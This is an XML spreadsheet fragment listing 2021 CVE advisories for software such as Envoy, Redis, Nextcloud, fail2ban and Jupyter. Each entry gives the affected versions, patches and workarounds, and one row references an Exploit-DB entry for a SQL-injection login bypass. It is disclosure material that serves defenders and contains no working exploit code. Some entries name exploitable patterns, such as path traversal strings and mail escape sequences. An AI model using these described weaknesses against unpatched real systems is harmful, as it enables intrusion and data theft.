    <t>Icinga Web 2 is an open source monitoring web interface, framework, and command-line interface. A vulnerability in which custom variables are exposed to unauthorized users exists between versions 2.0.0 and 2.8.2. Custom variables are user-defined keys and values on configuration objects in Icinga 2. These are commonly used to reference secrets in other configurations such as check commands to be able to authenticate with a service being checked. Icinga Web 2 displays these custom variables to logged in users with access to said hosts or services. In order to protect the secrets from being visible to anyone, it's possible to setup protection rules and blacklists in a user's role. Protection rules result in `***` being shown instead of the original value, the key will remain. Backlists will hide a custom variable entirely from the user. Besides using the UI, custom variables can also be accessed differently by using an undocumented URL parameter. By adding a parameter to the affected routes, Icinga Web 2 will show these columns additionally in the respective list. This parameter is also respected when exporting to JSON or CSV. Protection rules and blacklists however have no effect in this case. Custom variables are shown as-is in the result. The issue has been fixed in the 2.9.0, 2.8.3, and 2.7.5 releases. As a workaround, one may set up a restriction to hide hosts and services with the custom variable in question.</t>
  </si>
  <si>
    <t>CVE-2021-32748</t>
  </si>
  <si>
    <t>Nextcloud Richdocuments in an open source self hosted online office. Nextcloud uses the WOPI ("Web Application Open Platform Interface") protocol to communicate with the Collabora Editor, the communication between these two services was not protected by a credentials or IP check. Whilst this does not result in gaining access to data that the user has not yet access to, it can result in a bypass of any enforced watermark on documents as described on the [Nextcloud Virtual Data Room](https://nextcloud.com/virtual-data-room/) website and [our documentation](https://portal.nextcloud.com/article/nextcloud-and-virtual-data-room-configuration-59.html). The Nextcloud Richdocuments releases 3.8.3 and 4.2.0 add an additional admin settings for an allowlist of IP addresses that can access the WOPI API. We recommend upgrading and configuring the allowlist to a list of Collabora servers. There is no known workaround. Note that this primarily results a bypass of any configured watermark or download protection using File Access Control. If you do not require or rely on these as a security feature no immediate action is required on your end.</t>
  </si>
  <si>
    <t>CVE-2021-32749</t>
  </si>
  <si>
    <t>fail2ban is a daemon to ban hosts that cause multiple authentication errors. In versions 0.9.7 and prior, 0.10.0 through 0.10.6, and 0.11.0 through 0.11.2, there is a vulnerability that leads to possible remote code execution in the mailing action mail-whois. Command `mail` from mailutils package used in mail actions like `mail-whois` can execute command if unescaped sequences (`\n~`) are available in "foreign" input (for instance in whois output). To exploit the vulnerability, an attacker would need to insert malicious characters into the response sent by the whois server, either via a MITM attack or by taking over a whois server. The issue is patched in versions 0.10.7 and 0.11.3. As a workaround, one may avoid the usage of action `mail-whois` or patch the vulnerability manually.</t>
  </si>
  <si>
    <t>CVE-2021-3275</t>
  </si>
  <si>
    <t>Unauthenticated stored cross-site scripting (XSS) exists in multiple TP-Link products including WIFI Routers (Wireless AC routers), Access Points, ADSL + DSL Gateways and Routers, which affects TD-W9977v1, TL-WA801NDv5, TL-WA801Nv6, TL-WA802Nv5, and Archer C3150v2 devices through the improper validation of the hostname. Some of the pages including dhcp.htm, networkMap.htm, dhcpClient.htm, qsEdit.htm, and qsReview.htm and use this vulnerable hostname function (setDefaultHostname()) without sanitization.</t>
  </si>
  <si>
    <t>CVE-2021-32750</t>
  </si>
  <si>
    <t>MuWire is a file publishing and networking tool that protects the identity of its users by using I2P technology. Users of MuWire desktop client prior to version 0.8.8 can be de-anonymized by an attacker who knows their full ID. An attacker could send a message with a subject line containing a URL with an HTML image tag and the MuWire client would try to fetch that image via clearnet, thus exposing the IP address of the user. The problem is fixed in MuWire 0.8.8. As a workaround, users can disable messaging functionality to prevent other users from sending them malicious messages.</t>
  </si>
  <si>
    <t>CVE-2021-32751</t>
  </si>
  <si>
    <t>Gradle is a build tool with a focus on build automation. In versions prior to 7.2, start scripts generated by the `application` plugin and the `gradlew` script are both vulnerable to arbitrary code execution when an attacker is able to change environment variables for the user running the script. This may impact those who use `gradlew` on Unix-like systems or use the scripts generated by Gradle in thieir application on Unix-like systems. For this vulnerability to be exploitable, an attacker needs to be able to set the value of particular environment variables and have those environment variables be seen by the vulnerable scripts. This issue has been patched in Gradle 7.2 by removing the use of `eval` and requiring the use of the `bash` shell. There are a few workarounds available. For CI/CD systems using the Gradle build tool, one may ensure that untrusted users are unable to change environment variables for the user that executes `gradlew`. If one is unable to upgrade to Gradle 7.2, one may generate a new `gradlew` script with Gradle 7.2 and use it for older versions of Gradle. Fpplications using start scripts generated by Gradle, one may ensure that untrusted users are unable to change environment variables for the user that executes the start script. A vulnerable start script could be manually patched to remove the use of `eval` or the use of environment variables that affect the application's command-line. If the application is simple enough, one may be able to avoid the use of the start scripts by running the application directly with Java command.</t>
  </si>
  <si>
    <t>CVE-2021-32752</t>
  </si>
  <si>
    <t>Ether Logs is a package that allows one to check one's logs in the Craft 3 utilities section. A vulnerability was found in versions prior to 3.0.4 that allowed authenticated admin users to access any file on the server. The vulnerability has been fixed in version 3.0.4. As a workaround, one may disable the plugin if untrustworthy sources have admin access.</t>
  </si>
  <si>
    <t>CVE-2021-32753</t>
  </si>
  <si>
    <t>EdgeX Foundry is an open source project for building a common open framework for internet-of-things edge computing. A vulnerability exists in the Edinburgh, Fuji, Geneva, and Hanoi versions of the software. When the EdgeX API gateway is configured for OAuth2 authentication and a proxy user is created, the client_id and client_secret required to obtain an OAuth2 authentication token are set to the username of the proxy user. A remote network attacker can then perform a dictionary-based password attack on the OAuth2 token endpoint of the API gateway to obtain an OAuth2 authentication token and use that token to make authenticated calls to EdgeX microservices from an untrusted network. OAuth2 is the default authentication method in EdgeX Edinburgh release. The default authentication method was changed to JWT in Fuji and later releases. Users should upgrade to the EdgeX Ireland release to obtain the fix. The OAuth2 authentication method is disabled in Ireland release. If unable to upgrade and OAuth2 authentication is required, users should create OAuth2 users directly using the Kong admin API and forgo the use of the `security-proxy-setup` tool to create OAuth2 users.</t>
  </si>
  <si>
    <t>CVE-2021-32754</t>
  </si>
  <si>
    <t>FlowDroid is a data flow analysis tool. FlowDroid versions prior to 2.9.0 contained an XML external entity (XXE) vulnerability that allowed an attacker who had control over the source/sink definition file in XML format to read files from external locations. In order for this to occur, the XML-based format for sources and sinks had to be used and the attacker had to able control the source/sink definition file. The vulnerability was patched in version 2.9.0. As a workaround, do not allow untrusted entities to control the source/sink definition file.</t>
  </si>
  <si>
    <t>CVE-2021-32755</t>
  </si>
  <si>
    <t>Wire is a collaboration platform. wire-ios-transport handles authentication of requests, network failures, and retries for the iOS implementation of Wire. In the 3.82 version of the iOS application, a new web socket implementation was introduced for users running iOS 13 or higher. This new websocket implementation is not configured to enforce certificate pinning when available. Certificate pinning for the new websocket is enforced in version 3.84 or above.</t>
  </si>
  <si>
    <t>CVE-2021-32756</t>
  </si>
  <si>
    <t>ManageIQ is an open-source management platform. In versions prior to jansa-4, kasparov-2, and lasker-1, there is a flaw in the MiqExpression module of ManageIQ where a low privilege user could enter a crafted Ruby string which would be evaluated. Successful exploitation will allow an attacker to execute arbitrary code with root privileges on the host system. There are patches for this issue in releases named jansa-4, kasparov-2, and lasker-1. If possible, restrict users, via RBAC, to only the part of the application that they need access to. While MiqExpression is widely used throughout the product, restricting users can limit the surface of the attack.</t>
  </si>
  <si>
    <t>CVE-2021-32758</t>
  </si>
  <si>
    <t>OpenMage Magento LTS is an alternative to the Magento CE official releases. Prior to versions 19.4.15 and 20.0.11, layout XML enabled admin users to execute arbitrary commands via block methods. The latest OpenMage Versions up from v19.4.15 and v20.0.11 have this Issue patched.</t>
  </si>
  <si>
    <t>CVE-2021-32759</t>
  </si>
  <si>
    <t>OpenMage magento-lts is an alternative to the Magento CE official releases. Due to missing sanitation in data flow in versions prior to 19.4.15 and 20.0.13, it was possible for admin users to upload arbitrary executable files to the server. OpenMage versions 19.4.15 and 20.0.13 have a patch for this Issue.</t>
  </si>
  <si>
    <t>CVE-2021-32760</t>
  </si>
  <si>
    <t>containerd is a container runtime. A bug was found in containerd versions prior to 1.4.8 and 1.5.4 where pulling and extracting a specially-crafted container image can result in Unix file permission changes for existing files in the host’s filesystem. Changes to file permissions can deny access to the expected owner of the file, widen access to others, or set extended bits like setuid, setgid, and sticky. This bug does not directly allow files to be read, modified, or executed without an additional cooperating process. This bug has been fixed in containerd 1.5.4 and 1.4.8. As a workaround, ensure that users only pull images from trusted sources. Linux security modules (LSMs) like SELinux and AppArmor can limit the files potentially affected by this bug through policies and profiles that prevent containerd from interacting with specific files.</t>
  </si>
  <si>
    <t>CVE-2021-32761</t>
  </si>
  <si>
    <t>Redis is an in-memory database that persists on disk. A vulnerability involving out-of-bounds read and integer overflow to buffer overflow exists starting with version 2.2 and prior to versions 5.0.13, 6.0.15, and 6.2.5. On 32-bit systems, Redis `*BIT*` command are vulnerable to integer overflow that can potentially be exploited to corrupt the heap, leak arbitrary heap contents or trigger remote code execution. The vulnerability involves changing the default `proto-max-bulk-len` configuration parameter to a very large value and constructing specially crafted commands bit commands. This problem only affects Redis on 32-bit platforms, or compiled as a 32-bit binary. Redis versions 5.0.`3m 6.0.15, and 6.2.5 contain patches for this issue. An additional workaround to mitigate the problem without patching the `redis-server` executable is to prevent users from modifying the `proto-max-bulk-len` configuration parameter. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.</t>
  </si>
  <si>
    <t>CVE-2021-32762</t>
  </si>
  <si>
    <t>Redis is an open source, in-memory database that persists on disk. The redis-cli command line tool and redis-sentinel service may be vulnerable to integer overflow when parsing specially crafted large multi-bulk network replies. This is a result of a vulnerability in the underlying hiredis library which does not perform an overflow check before calling the calloc() heap allocation function. This issue only impacts systems with heap allocators that do not perform their own overflow checks. Most modern systems do and are therefore not likely to be affected. Furthermore, by default redis-sentinel uses the jemalloc allocator which is also not vulnerable. The problem is fixed in Redis versions 6.2.6, 6.0.16 and 5.0.14.</t>
  </si>
  <si>
    <t>CVE-2021-32763</t>
  </si>
  <si>
    <t>OpenProject is open-source, web-based project management software. In versions prior to 11.3.3, the `MessagesController` class of OpenProject has a `quote` method that implements the logic behind the Quote button in the discussion forums, and it uses a regex to strip `&lt;pre&gt;` tags from the message being quoted. The `(.|\s)` part can match a space character in two ways, so an unterminated `&lt;pre&gt;` tag containing `n` spaces causes Ruby's regex engine to backtrack to try 2&lt;sup&gt;n&lt;/sup&gt; states in the NFA. This will result in a Regular Expression Denial of Service. The issue is fixed in OpenProject 11.3.3. As a workaround, one may install the patch manually.</t>
  </si>
  <si>
    <t>CVE-2021-32764</t>
  </si>
  <si>
    <t>Discourse is an open-source discussion platform. In Discourse versions 2.7.5 and prior, parsing and rendering of YouTube Oneboxes can be susceptible to XSS attacks. This vulnerability only affects sites which have modified or disabled Discourse's default Content Security Policy. The issue is patched in `stable` version 2.7.6, `beta` version 2.8.0.beta3, and `tests-passed` version 2.8.0.beta3. As a workaround, ensure that the Content Security Policy is enabled, and has not been modified in a way which would make it more vulnerable to XSS attacks.</t>
  </si>
  <si>
    <t>CVE-2021-32765</t>
  </si>
  <si>
    <t>Hiredis is a minimalistic C client library for the Redis database. In affected versions Hiredis is vulnurable to integer overflow if provided maliciously crafted or corrupted `RESP` `mult-bulk` protocol data. When parsing `multi-bulk` (array-like) replies, hiredis fails to check if `count * sizeof(redisReply*)` can be represented in `SIZE_MAX`. If it can not, and the `calloc()` call doesn't itself make this check, it would result in a short allocation and subsequent buffer overflow. Users of hiredis who are unable to update may set the [maxelements](https://github.com/redis/hiredis#reader-max-array-elements) context option to a value small enough that no overflow is possible.</t>
  </si>
  <si>
    <t>CVE-2021-32766</t>
  </si>
  <si>
    <t>Nextcloud Text is an open source plaintext editing application which ships with the nextcloud server. In affected versions the Nextcloud Text application returned different error messages depending on whether a folder existed in a public link share. This is problematic in case the public link share has been created with "Upload Only" privileges. (aka "File Drop"). A link share recipient is not expected to see which folders or files exist in a "File Drop" share. Using this vulnerability an attacker is able to enumerate folders in such a share. Exploitation requires that the attacker has access to a valid affected "File Drop" link share. It is recommended that the Nextcloud Server is upgraded to 20.0.12, 21.0.4 or 22.0.1. Users who are unable to upgrade are advised to disable the Nextcloud Text application in the app settings.</t>
  </si>
  <si>
    <t>CVE-2021-32767</t>
  </si>
  <si>
    <t>TYPO3 is an open source PHP based web content management system. In versions 9.0.0 through 9.5.27, 10.0.0 through 10.4.17, and 11.0.0 through 11.3.0, user credentials may been logged as plain-text. This occurs when explicitly using log level debug, which is not the default configuration. TYPO3 versions 9.5.28, 10.4.18, 11.3.1 contain a patch for this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32768</t>
  </si>
  <si>
    <t>TYPO3 is an open source PHP based web content management system released under the GNU GPL. In affected versions failing to properly parse, sanitize and encode malicious rich-text content, the content rendering process in the website frontend is vulnerable to cross-site scripting. Corresponding rendering instructions via TypoScript functionality HTMLparser does not consider all potentially malicious HTML tag &amp; attribute combinations per default. In default scenarios, a valid backend user account is needed to exploit this vulnerability. In case custom plugins used in the website frontend accept and reflect rich-text content submitted by users, no authentication is required. Update to TYPO3 versions 7.6.53 ELTS, 8.7.42 ELTS, 9.5.29, 10.4.19, 11.3.2 that fix the problem described.</t>
  </si>
  <si>
    <t>CVE-2021-32769</t>
  </si>
  <si>
    <t>Micronaut is a JVM-based, full stack Java framework designed for building JVM applications. A path traversal vulnerability exists in versions prior to 2.5.9. With a basic configuration, it is possible to access any file from a filesystem, using "/../../" in the URL. This occurs because Micronaut does not restrict file access to configured paths. The vulnerability is patched in version 2.5.9. As a workaround, do not use `**` in mapping, use only `*`, which exposes only flat structure of a directory not allowing traversal. If using Linux, another workaround is to run micronaut in chroot.</t>
  </si>
  <si>
    <t>CVE-2021-3277</t>
  </si>
  <si>
    <t>Nagios XI 5.7.5 and earlier allows authenticated admins to upload arbitrary files due to improper validation of the rename functionality in custom-includes component, which leads to remote code execution by uploading php files.</t>
  </si>
  <si>
    <t>CVE-2021-32770</t>
  </si>
  <si>
    <t>Gatsby is a framework for building websites. The gatsby-source-wordpress plugin prior to versions 4.0.8 and 5.9.2 leaks .htaccess HTTP Basic Authentication variables into the app.js bundle during build-time. Users who are not initializing basic authentication credentials in the gatsby-config.js are not affected. A patch has been introduced in gatsby-source-wordpress@4.0.8 and gatsby-source-wordpress@5.9.2 which mitigates the issue by filtering all variables specified in the `auth: { }` section. Users that depend on this functionality are advised to upgrade to the latest release of gatsby-source-wordpress, run `gatsby clean` followed by a `gatsby build`. One may manually edit the app.js file post-build as a workaround.</t>
  </si>
  <si>
    <t>CVE-2021-32771</t>
  </si>
  <si>
    <t>Contiki-NG is an open-source, cross-platform operating system for IoT devices. In affected versions it is possible to cause a buffer overflow when copying an IPv6 address prefix in the RPL-Classic implementation in Contiki-NG. In order to trigger the vulnerability, the Contiki-NG system must have joined an RPL DODAG. After that, an attacker can send a DAO packet with a Target option that contains a prefix length larger than 128 bits. The problem was fixed after the release of Contiki-NG 4.7. Users unable to upgrade may apply the patch in Contiki-NG PR #1615.</t>
  </si>
  <si>
    <t>CVE-2021-32772</t>
  </si>
  <si>
    <t>Poddycast is a podcast app made with Electron. Prior to version 0.8.1, an attacker can create a podcast or episode with malicious characters and execute commands on the client machine. The application does not clean the HTML characters of the podcast information obtained from the Feed, which allows the injection of HTML and JS code (cross-site scripting). Being an application made in electron, cross-site scripting can be scaled to remote code execution, making it possible to execute commands on the machine where the application is running. The vulnerability is patched in Poddycast version 0.8.1.</t>
  </si>
  <si>
    <t>CVE-2021-32773</t>
  </si>
  <si>
    <t>Racket is a general-purpose programming language and an ecosystem for language-oriented programming. In versions prior to 8.2, code evaluated using the Racket sandbox could cause system modules to incorrectly use attacker-created modules instead of their intended dependencies. This could allow system functions to be controlled by the attacker, giving access to facilities intended to be restricted. This problem is fixed in Racket version 8.2. A workaround is available, depending on system settings. For systems that provide arbitrary Racket evaluation, external sandboxing such as containers limit the impact of the problem. For multi-user evaluation systems, such as the `handin-server` system, it is not possible to work around this problem and upgrading is required.</t>
  </si>
  <si>
    <t>CVE-2021-32774</t>
  </si>
  <si>
    <t>DataDump is a MediaWiki extension that provides dumps of wikis. Prior to commit 67a82b76e186925330b89ace9c5fd893a300830b, DataDump had no protection against CSRF attacks so requests to generate or delete dumps could be forged. The vulnerability was patched in commit 67a82b76e186925330b89ace9c5fd893a300830b. There are no known workarounds. You must completely disable DataDump.</t>
  </si>
  <si>
    <t>CVE-2021-32775</t>
  </si>
  <si>
    <t>Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.4, a non admin user can get access to many class/field values through GroupBy Dashlet error message. This issue is fixed in versions 2.7.4 and 3.0.0.</t>
  </si>
  <si>
    <t>CVE-2021-32776</t>
  </si>
  <si>
    <t>Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.4, CSRF tokens can be reused by a malicious user, as on Windows servers no cleanup is done on CSRF tokens. This issue is fixed in versions 2.7.4 and 3.0.0.</t>
  </si>
  <si>
    <t>CVE-2021-32777</t>
  </si>
  <si>
    <t>Envoy is an open source L7 proxy and communication bus designed for large modern service oriented architectures. In affected versions when ext-authz extension is sending request headers to the external authorization service it must merge multiple value headers according to the HTTP spec. However, only the last header value is sent. This may allow specifically crafted requests to bypass authorization. Attackers may be able to escalate privileges when using ext-authz extension or back end service that uses multiple value headers for authorization. A specifically constructed request may be delivered by an untrusted downstream peer in the presence of ext-authz extension. Envoy versions 1.19.1, 1.18.4, 1.17.4, 1.16.5 contain fixes to the ext-authz extension to correctly merge multiple request header values, when sending request for authorization.</t>
  </si>
  <si>
    <t>CVE-2021-32778</t>
  </si>
  <si>
    <t>Envoy is an open source L7 proxy and communication bus designed for large modern service oriented architectures. In affected versions envoy’s procedure for resetting a HTTP/2 stream has O(N^2) complexity, leading to high CPU utilization when a large number of streams are reset. Deployments are susceptible to Denial of Service when Envoy is configured with high limit on H/2 concurrent streams. An attacker wishing to exploit this vulnerability would require a client opening and closing a large number of H/2 streams. Envoy versions 1.19.1, 1.18.4, 1.17.4, 1.16.5 contain fixes to reduce time complexity of resetting HTTP/2 streams. As a workaround users may limit the number of simultaneous HTTP/2 dreams for upstream and downstream peers to a low number, i.e. 100.</t>
  </si>
  <si>
    <t>CVE-2021-32779</t>
  </si>
  <si>
    <t>Envoy is an open source L7 proxy and communication bus designed for large modern service oriented architectures. In affected versions envoy incorrectly handled a URI '#fragment' element as part of the path element. Envoy is configured with an RBAC filter for authorization or similar mechanism with an explicit case of a final "/admin" path element, or is using a negative assertion with final path element of "/admin". The client sends request to "/app1/admin#foo". In Envoy prior to 1.18.0, or 1.18.0+ configured with path_normalization=false. Envoy treats fragment as a suffix of the query string when present, or as a suffix of the path when query string is absent, so it evaluates the final path element as "/admin#foo" and mismatches with the configured "/admin" path element. In Envoy 1.18.0+ configured with path_normalization=true. Envoy transforms this to /app1/admin%23foo and mismatches with the configured /admin prefix. The resulting URI is sent to the next server-agent with the offending "#foo" fragment which violates RFC3986 or with the nonsensical "%23foo" text appended. A specifically constructed request with URI containing '#fragment' element delivered by an untrusted client in the presence of path based request authorization resulting in escalation of Privileges when path based request authorization extensions. Envoy versions 1.19.1, 1.18.4, 1.17.4, 1.16.5 contain fixes that removes fragment from URI path in incoming requests.</t>
  </si>
  <si>
    <t>CVE-2021-3278</t>
  </si>
  <si>
    <t>Local Service Search Engine Management System 1.0 has a vulnerability through authentication bypass using SQL injection . Using this vulnerability, an attacker can bypass the login page.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49163.txt</t>
  </si>
  <si>
    <t>Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass</t>
  </si>
  <si>
    <t>CVE-2021-32780</t>
  </si>
  <si>
    <t>Envoy is an open source L7 proxy and communication bus designed for large modern service oriented architectures. In affected versions Envoy transitions a H/2 connection to the CLOSED state when it receives a GOAWAY frame without any streams outstanding. The connection state is transitioned to DRAINING when it receives a SETTING frame with the SETTINGS_MAX_CONCURRENT_STREAMS parameter set to 0. Receiving these two frames in the same I/O event results in abnormal termination of the Envoy process due to invalid state transition from CLOSED to DRAINING. A sequence of H/2 frames delivered by an untrusted upstream server will result in Denial of Service in the presence of untrusted **upstream** servers. Envoy versions 1.19.1, 1.18.4 contain fixes to stop processing of pending H/2 frames after connection transition to the CLOSED state.</t>
  </si>
  <si>
    <t>CVE-2021-32781</t>
  </si>
  <si>
    <t>Envoy is an open source L7 proxy and communication bus designed for large modern service oriented architectures. In affected versions after Envoy sends a locally generated response it must stop further processing of request or response data. However when local response is generated due the internal buffer overflow while request or response is processed by the filter chain the operation may not be stopped completely and result in accessing a freed memory block. A specifically constructed request delivered by an untrusted downstream or upstream peer in the presence of extensions that modify and increase the size of request or response bodies resulting in a Denial of Service when using extensions that modify and increase the size of request or response bodies, such as decompressor filter. Envoy versions 1.19.1, 1.18.4, 1.17.4, 1.16.5 contain fixes to address incomplete termination of request processing after locally generated response. As a workaround disable Envoy's decompressor, json-transcoder or grpc-web extensions or proprietary extensions that modify and increase the size of request or response bodies, if feasible.</t>
  </si>
  <si>
    <t>CVE-2021-32782</t>
  </si>
  <si>
    <t>Nextcloud Circles is an open source social network built for the nextcloud ecosystem. In affected versions the Nextcloud Circles application is vulnerable to a stored Cross-Site Scripting (XSS) vulnerability. Due the strict Content-Security-Policy shipped with Nextcloud, this issue is not exploitable on modern browsers supporting Content-Security-Policy. It is recommended that the Nextcloud Circles application is upgraded to 0.21.3, 0.20.10 or 0.19.14 to resolve this issue. As a workaround users may use a browser that has support for Content-Security-Policy. A notable exemption is Internet Explorer which does not support CSP properly.</t>
  </si>
  <si>
    <t>CVE-2021-32783</t>
  </si>
  <si>
    <t>Contour is a Kubernetes ingress controller using Envoy proxy. In Contour before version 1.17.1 a specially crafted ExternalName type Service may be used to access Envoy's admin interface, which Contour normally prevents from access outside the Envoy container. This can be used to shut down Envoy remotely (a denial of service), or to expose the existence of any Secret that Envoy is using for its configuration, including most notably TLS Keypairs. However, it *cannot* be used to get the *content* of those secrets. Since this attack allows access to the administration interface, a variety of administration options are available, such as shutting down the Envoy or draining traffic. In general, the Envoy admin interface cannot easily be used for making changes to the cluster, in-flight requests, or backend services, but it could be used to shut down or drain Envoy, change traffic routing, or to retrieve secret metadata, as mentioned above. The issue will be addressed in Contour v1.18.0 and a cherry-picked patch release, v1.17.1, has been released to cover users who cannot upgrade at this time. For more details refer to the linked GitHub Security Advisory.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2021-32785</t>
  </si>
  <si>
    <t>mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. When mod_auth_openidc versions prior to 2.4.9 are configured to use an unencrypted Redis cache (`OIDCCacheEncrypt off`, `OIDCSessionType server-cache`, `OIDCCacheType redis`), `mod_auth_openidc` wrongly performed argument interpolation before passing Redis requests to `hiredis`, which would perform it again and lead to an uncontrolled format string bug. Initial assessment shows that this bug does not appear to allow gaining arbitrary code execution, but can reliably provoke a denial of service by repeatedly crashing the Apache workers. This bug has been corrected in version 2.4.9 by performing argument interpolation only once, using the `hiredis` API. As a workaround, this vulnerability can be mitigated by setting `OIDCCacheEncrypt` to `on`, as cache keys are cryptographically hashed before use when this option is enabled.</t>
  </si>
  <si>
    <t>CVE-2021-32786</t>
  </si>
  <si>
    <t>mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. In versions prior to 2.4.9, `oidc_validate_redirect_url()` does not parse URLs the same way as most browsers do. As a result, this function can be bypassed and leads to an Open Redirect vulnerability in the logout functionality. This bug has been fixed in version 2.4.9 by replacing any backslash of the URL to redirect with slashes to address a particular breaking change between the different specifications (RFC2396 / RFC3986 and WHATWG). As a workaround, this vulnerability can be mitigated by configuring `mod_auth_openidc` to only allow redirection whose destination matches a given regular expression.</t>
  </si>
  <si>
    <t>CVE-2021-32787</t>
  </si>
  <si>
    <t>Sourcegraph is a code search and navigation engine. Sourcegraph before version 3.30.0 has two potential information leaks. The site-admin area can be accessed by regular users and all information and features are properly protected except for daily usage statistics and code intelligence uploads and indexes. It is not possible to alter the information, nor interact with any other features in the site-admin area. The issue is patched in version 3.30.0, where the information cannot be accessed by unprivileged users. There are no workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-32788</t>
  </si>
  <si>
    <t>Discourse is an open source discussion platform. In versions prior to 2.7.7 there are two bugs which led to the post creator of a whisper post being revealed to non-staff users. 1: Staff users that creates a whisper post in a personal message is revealed to non-staff participants of the personal message even though the whisper post cannot be seen by them. 2: When a whisper post is before the last post in a post stream, deleting the last post will result in the creator of the whisper post to be revealed to non-staff users as the last poster of the topic.</t>
  </si>
  <si>
    <t>CVE-2021-32789</t>
  </si>
  <si>
    <t>woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-3279</t>
  </si>
  <si>
    <t>sz.chat version 4 allows injection of web scripts and HTML in the message box.</t>
  </si>
  <si>
    <t>CVE-2021-32790</t>
  </si>
  <si>
    <t>Woocommerce is an open source eCommerce plugin for WordPress. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce plugin between version 3.3.0 and 3.3.6. Malicious actors (already) having admin access, or API keys to the WooCommerce site can exploit vulnerable endpoints of `/wp-json/wc/v3/webhooks`, `/wp-json/wc/v2/webhooks` and other webhook listing API. Read-only SQL queries can be executed using this exploit, while data will not be returned, by carefully crafting `search` parameter information can be disclosed using timing and related attacks. Version 3.3.6 is the earliest version of Woocommerce with a patch for this vulnerability. There are no known workarounds other than upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-32791</t>
  </si>
  <si>
    <t>mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. In mod_auth_openidc before version 2.4.9, the AES GCM encryption in mod_auth_openidc uses a static IV and AAD. It is important to fix because this creates a static nonce and since aes-gcm is a stream cipher, this can lead to known cryptographic issues, since the same key is being reused. From 2.4.9 onwards this has been patched to use dynamic values through usage of cjose AES encryption routines.</t>
  </si>
  <si>
    <t>CVE-2021-32792</t>
  </si>
  <si>
    <t>mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. In mod_auth_openidc before version 2.4.9, there is an XSS vulnerability in when using `OIDCPreservePost On`.</t>
  </si>
  <si>
    <t>CVE-2021-32793</t>
  </si>
  <si>
    <t>Pi-hole's Web interface provides a central location to manage a Pi-hole instance and review performance statistics. Prior to Pi-hole Web interface version 5.5.1, the function to add domains to blocklists or allowlists is vulnerable to a stored cross-site-scripting vulnerability. User input added as a wildcard domain to a blocklist or allowlist is unfiltered in the web interface. Since the payload is stored permanently as a wildcard domain, this is a persistent XSS vulnerability. A remote attacker can therefore attack administrative user accounts through client-side attacks. Pi-hole Web Interface version 5.5.1 contains a patch for this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32794</t>
  </si>
  <si>
    <t>ArchiSteamFarm is a C# application with primary purpose of idling Steam cards from multiple accounts simultaneously. Due to a bug in ASF code `POST /Api/ASF` ASF API endpoint responsible for updating global ASF config incorrectly removed `IPCPassword` from the resulting config when the caller did not specify it explicitly. Due to the above, it was possible for the user to accidentally remove `IPCPassword` security measure from his IPC interface when updating global ASF config, which exists as part of global config update functionality in ASF-ui. Removal of `IPCPassword` possesses a security risk, as unauthorized users may in result access the IPC interface after such modification. The issue is patched in ASF V5.1.2.4 and future versions. We recommend to manually verify that `IPCPassword` is specified after update, and if not, set it accordingly. In default settings, ASF is configured to allow IPC access from `localhost` only and should not affect majority of users.</t>
  </si>
  <si>
    <t>CVE-2021-32795</t>
  </si>
  <si>
    <t>ArchiSteamFarm is a C# application with primary purpose of idling Steam cards from multiple accounts simultaneously. In versions prior to 4.3.1.0 a Denial of Service (aka DoS) vulnerability which allows attacker to remotely crash running ASF instance through sending a specifically-crafted Steam chat message exists. The user sending the message does not need to be authorized within the bot or ASF process. The attacker needs to know ASF's `CommandPrefix` in advance, but majority of ASF setups run with an unchanged default value. This attack does not allow attacker to gain any potentially-sensitive information, such as logins or passwords, does not allow to execute arbitrary commands and otherwise exploit the crash further. The issue is patched in ASF V4.3.1.0. The only workaround which guarantees complete protection is running all bots with `OnlineStatus` of `0` (Offline). In this setup, ASF is able to ignore even the specifically-crafted message without attempting to interpret it.</t>
  </si>
  <si>
    <t>CVE-2021-32796</t>
  </si>
  <si>
    <t>xmldom is an open source pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. xmldom versions 0.6.0 and older do not correctly escape special characters when serializing elements removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications. This issue has been resolved in version 0.7.0. As a workaround downstream applications can validate the input and reject the maliciously crafted documents.</t>
  </si>
  <si>
    <t>CVE-2021-32797</t>
  </si>
  <si>
    <t>JupyterLab is a user interface for Project Jupyter which will eventually replace the classic Jupyter Notebook. In affected versions untrusted notebook can execute code on load. In particular JupyterLab doesn’t sanitize the action attribute of html `&lt;form&gt;`. Using this it is possible to trigger the form validation outside of the form itself. This is a remote code execution, but requires user action to open a notebook.</t>
  </si>
  <si>
    <t>CVE-2021-32798</t>
  </si>
  <si>
    <t>The Jupyter notebook is a web-based notebook environment for interactive computing. In affected versions untrusted notebook can execute code on load. Jupyter Notebook uses a deprecated version of Google Caja to sanitize user inputs. A public Caja bypass can be used to trigger an XSS when a victim opens a malicious ipynb document in Jupyter Notebook. The XSS allows an attacker to execute arbitrary code on the victim computer using Jupyter APIs.</t>
  </si>
  <si>
